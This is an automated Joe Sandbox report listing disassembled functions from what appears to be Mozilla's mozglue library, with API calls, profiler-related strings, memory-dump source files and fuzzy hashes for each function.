                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFE765A
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CFE74D7,6CFF15FC,?,?,?), ref: 6CFE7663
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CFE74D7,6CFF15FC,?,?,?), ref: 6CFE7677
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 418114769-0
                                                                                                      • Opcode ID: 7a27497fc7e2561a4375aa447816c1cdb9370250609b583f3e847ffc71cca4aa
                                                                                                      • Instruction ID: 2db08356401d954e0f13e3dbec86979860655bea43222ffc9e0b080d3876303c
                                                                                                      • Opcode Fuzzy Hash: 7a27497fc7e2561a4375aa447816c1cdb9370250609b583f3e847ffc71cca4aa
                                                                                                      • Instruction Fuzzy Hash: 1FF08C71D10745ABD7008FA1C889776BBB8FFAB259F11431AF90582601E7B1A5D18BD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFBD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD4F2
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD50B
                                                                                                        • Part of subcall function 6CF9CFE0: EnterCriticalSection.KERNEL32(6D01E784), ref: 6CF9CFF6
                                                                                                        • Part of subcall function 6CF9CFE0: LeaveCriticalSection.KERNEL32(6D01E784), ref: 6CF9D026
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD52E
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E7DC), ref: 6CFBD690
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD751
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                      • String ID: MOZ_CRASH()
                                                                                                      • API String ID: 3805649505-2608361144
                                                                                                      • Opcode ID: c3d1ff287d884057170d11db2bb862bc2e1b8134fc19a4403c14a18c86c0ed66
                                                                                                      • Instruction ID: ae73e150063f4f0119d3ceed2cf445dc032f3940e28919c72f44ae3399b8067f
                                                                                                      • Opcode Fuzzy Hash: c3d1ff287d884057170d11db2bb862bc2e1b8134fc19a4403c14a18c86c0ed66
                                                                                                      • Instruction Fuzzy Hash: DC51E471A047028FE314CF69C59475ABBF6FB89304F244A2ED5A9D7B88D770E800CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv
                                                                                                      • String ID: -%llu$.$profiler-paused
                                                                                                      • API String ID: 3732870572-2661126502
                                                                                                      • Opcode ID: 26e3f834d4129dd8f7176780dff8eaf4cde1fac536e74228e73efe65f4bbda5b
                                                                                                      • Instruction ID: 4ee750678efd8552dce51526cf92a971e7226e85c9892f7049b93889530da9bd
                                                                                                      • Opcode Fuzzy Hash: 26e3f834d4129dd8f7176780dff8eaf4cde1fac536e74228e73efe65f4bbda5b
                                                                                                      • Instruction Fuzzy Hash: 21412671E04709ABCB08DFB9D85129EBFF9EF89744F10863DE85597B81EB3098448792
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __aulldiv.LIBCMT ref: 6CFE4721
                                                                                                        • Part of subcall function 6CF94410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CFD3EBD,00000017,?,00000000,?,6CFD3EBD,?,?,6CF942D2), ref: 6CF94444
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                      • String ID: -%llu$.$profiler-paused
                                                                                                      • API String ID: 680628322-2661126502
                                                                                                      • Opcode ID: 8000e61284095306a8d82106c4bbaa52265ba0ec6fb1c8b68750a54616ef31d6
                                                                                                      • Instruction ID: ddb6c532a2bdea4cf88b796b257424dacc452b617f88d38d7fce6af0101dba5b
                                                                                                      • Opcode Fuzzy Hash: 8000e61284095306a8d82106c4bbaa52265ba0ec6fb1c8b68750a54616ef31d6
                                                                                                      • Instruction Fuzzy Hash: 16314871F042086BDB0CCFADD89129EBFE6EB8C314F15853EE8059B781EB7498048B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFEB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CF94290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CFD3EBD,6CFD3EBD,00000000), ref: 6CF942A9
                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CFEB127), ref: 6CFEB463
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFEB4C9
                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CFEB4E4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _getpidstrlenstrncmptolower
                                                                                                      • String ID: pid:
                                                                                                      • API String ID: 1720406129-3403741246
                                                                                                      • Opcode ID: facb4cb15aa308015e81730f322f7ada9a9cd928f6b2ea077ff6ccfae203c16f
                                                                                                      • Instruction ID: 0803d3445ec0c3a6732300f0358bb14c73872a1b7ebd4fc9bb25fbb329de55cb
                                                                                                      • Opcode Fuzzy Hash: facb4cb15aa308015e81730f322f7ada9a9cd928f6b2ea077ff6ccfae203c16f
                                                                                                      • Instruction Fuzzy Hash: A231F431A01309EFDB00DFA9D880BEEB7B5FF49318F540929E81167A41D731A849CBE5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFDE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDE577
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDE584
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDE5DE
                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CFDE8A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                      • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                      • API String ID: 1483687287-53385798
                                                                                                      • Opcode ID: b3c3eeeb7763bab40b9f170f1d26382be06e47b204b1f202b09801ba7c6a9275
                                                                                                      • Instruction ID: 81b7a2caae0c36081bbf06f4e9a5ade5bc1935063dd2621dfbfbe734d0a5d1e7
                                                                                                      • Opcode Fuzzy Hash: b3c3eeeb7763bab40b9f170f1d26382be06e47b204b1f202b09801ba7c6a9275
                                                                                                      • Instruction Fuzzy Hash: CB11A132904264DFDB00DF94CC4AB6ABBF8FB89368F550619E86A87740D770A845CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CFE0CD5
                                                                                                        • Part of subcall function 6CFCF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CFCF9A7
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CFE0D40
                                                                                                      • free.MOZGLUE ref: 6CFE0DCB
                                                                                                        • Part of subcall function 6CFB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CFB5EDB
                                                                                                        • Part of subcall function 6CFB5E90: memset.VCRUNTIME140(6CFF7765,000000E5,55CCCCCC), ref: 6CFB5F27
                                                                                                        • Part of subcall function 6CFB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CFB5FB2
                                                                                                      • free.MOZGLUE ref: 6CFE0DDD
                                                                                                      • free.MOZGLUE ref: 6CFE0DF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4069420150-0
                                                                                                      • Opcode ID: cff696e64412f78440234cdddf8e46501805a2fa4364bf834d85e0d24c89d317
                                                                                                      • Instruction ID: 1715ebcb76fcc71e86f55aeac5695a6cb74db69ecf7798dd077e1d6b46084c67
                                                                                                      • Opcode Fuzzy Hash: cff696e64412f78440234cdddf8e46501805a2fa4364bf834d85e0d24c89d317
                                                                                                      • Instruction Fuzzy Hash: EB413A71908780ABD320CF29C48079EFBE5BFC9754F118A2EE8D887710DBB09445CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFECCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFECDA4
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                        • Part of subcall function 6CFED130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CFECDBA,00100000,?,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFED158
                                                                                                        • Part of subcall function 6CFED130: InitializeConditionVariable.KERNEL32(00000098,?,6CFECDBA,00100000,?,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFED177
                                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFECDC4
                                                                                                        • Part of subcall function 6CFE7480: ReleaseSRWLockExclusive.KERNEL32(?,6CFF15FC,?,?,?,?,6CFF15FC,?), ref: 6CFE74EB
                                                                                                      • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFECECC
                                                                                                        • Part of subcall function 6CFACA10: mozalloc_abort.MOZGLUE(?), ref: 6CFACAA2
                                                                                                        • Part of subcall function 6CFDCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CFECEEA,?,?,?,?,00000000,?,6CFDDA31,00100000,?,?,00000000), ref: 6CFDCB57
                                                                                                        • Part of subcall function 6CFDCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CFDCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CFECEEA,?,?), ref: 6CFDCBAF
                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFED058
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                      • String ID:
                                                                                                      • API String ID: 861561044-0
                                                                                                      • Opcode ID: 741cc6e199079def58db3336a9d2df46e612ecb3c58e20f8f59437b2a8437be6
                                                                                                      • Instruction ID: 169dbd40c78fbf484ba755a01f648a6f9f63337cd2cbdac8f26256f847019d16
                                                                                                      • Opcode Fuzzy Hash: 741cc6e199079def58db3336a9d2df46e612ecb3c58e20f8f59437b2a8437be6
                                                                                                      • Instruction Fuzzy Hash: E3D17071A04B46AFD708CF28C480B99FBE1BF89304F05862DE95987752EB31E965CBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFB5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetTickCount64.KERNEL32 ref: 6CFB5D40
                                                                                                      • EnterCriticalSection.KERNEL32(6D01F688), ref: 6CFB5D67
                                                                                                      • __aulldiv.LIBCMT ref: 6CFB5DB4
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01F688), ref: 6CFB5DED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                      • String ID:
                                                                                                      • API String ID: 557828605-0
                                                                                                      • Opcode ID: 8e4176b162b243dbeee038808f18199a94f7d6a70ced983e97be1766730b9587
                                                                                                      • Instruction ID: 13b96e4e8a77e6b6716e65627c2b283851b71fcae70e3a006e0490e5b5773a10
                                                                                                      • Opcode Fuzzy Hash: 8e4176b162b243dbeee038808f18199a94f7d6a70ced983e97be1766730b9587
                                                                                                      • Instruction Fuzzy Hash: 1C517D72E042298FCF08CFA9C855BAEBBB6FB89304F19861DD825B7750C7746945CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF9CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF9CEBD
                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CF9CEF5
                                                                                                      • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CF9CF4E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 438689982-4108050209
                                                                                                      • Opcode ID: da439991182a5e866317c34d3ebecf51e52030f1455aed99f285427a2ba4e7f3
                                                                                                      • Instruction ID: 7bcb30a784d5212cc0146187d3d5c15a5ea022d6f4cb3d758f76f8fb28cc51ec
                                                                                                      • Opcode Fuzzy Hash: da439991182a5e866317c34d3ebecf51e52030f1455aed99f285427a2ba4e7f3
                                                                                                      • Instruction Fuzzy Hash: E1511475A042168FDB04CF18C890A9ABBB5EF99304F19859DD85A5F352D731ED06CBE0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CFD82BC,?,?), ref: 6CFD649B
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFD64A9
                                                                                                        • Part of subcall function 6CFCFA80: GetCurrentThreadId.KERNEL32 ref: 6CFCFA8D
                                                                                                        • Part of subcall function 6CFCFA80: AcquireSRWLockExclusive.KERNEL32(6D01F448), ref: 6CFCFA99
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFD653F
                                                                                                      • free.MOZGLUE(?), ref: 6CFD655A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3596744550-0
                                                                                                      • Opcode ID: 4d7bf1c7724fbc7a2db16ab829574dfa9c773e3205a7f3564a9720172e1743ea
                                                                                                      • Instruction ID: edbc7d540c42bfeccc6824f0ac95e9c5fc0f397f2afdbc48c4c4b13cb071fd76
                                                                                                      • Opcode Fuzzy Hash: 4d7bf1c7724fbc7a2db16ab829574dfa9c773e3205a7f3564a9720172e1743ea
                                                                                                      • Instruction Fuzzy Hash: 2D317EB5A043059FD704CF14D880B9EBBE4BF89314F10482EF85A97741EB30E919CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFAB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFAB4F5
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFAB502
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFAB542
                                                                                                      • free.MOZGLUE(?), ref: 6CFAB578
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2047719359-0
                                                                                                      • Opcode ID: 2ed93f1bf0435bdaa705c9efd78f21df9b7bb944f926a208c2013e765eb4f06f
                                                                                                      • Instruction ID: b7e213375b4fdf9715d573d8fa19b3a0a09499860dd71e13b35e2c20830f85b3
                                                                                                      • Opcode Fuzzy Hash: 2ed93f1bf0435bdaa705c9efd78f21df9b7bb944f926a208c2013e765eb4f06f
                                                                                                      • Instruction Fuzzy Hash: CB11E432814B45CBD312CFE9C8007A2F7B5FF96318F10570AE85953A01EBB0B1C68790
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CF9F20E,?), ref: 6CFD3DF5
                                                                                                      • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CF9F20E,00000000,?), ref: 6CFD3DFC
                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CFD3E06
                                                                                                      • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CFD3E0E
                                                                                                        • Part of subcall function 6CFCCC00: GetCurrentProcess.KERNEL32(?,?,6CF931A7), ref: 6CFCCC0D
                                                                                                        • Part of subcall function 6CFCCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CF931A7), ref: 6CFCCC16
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
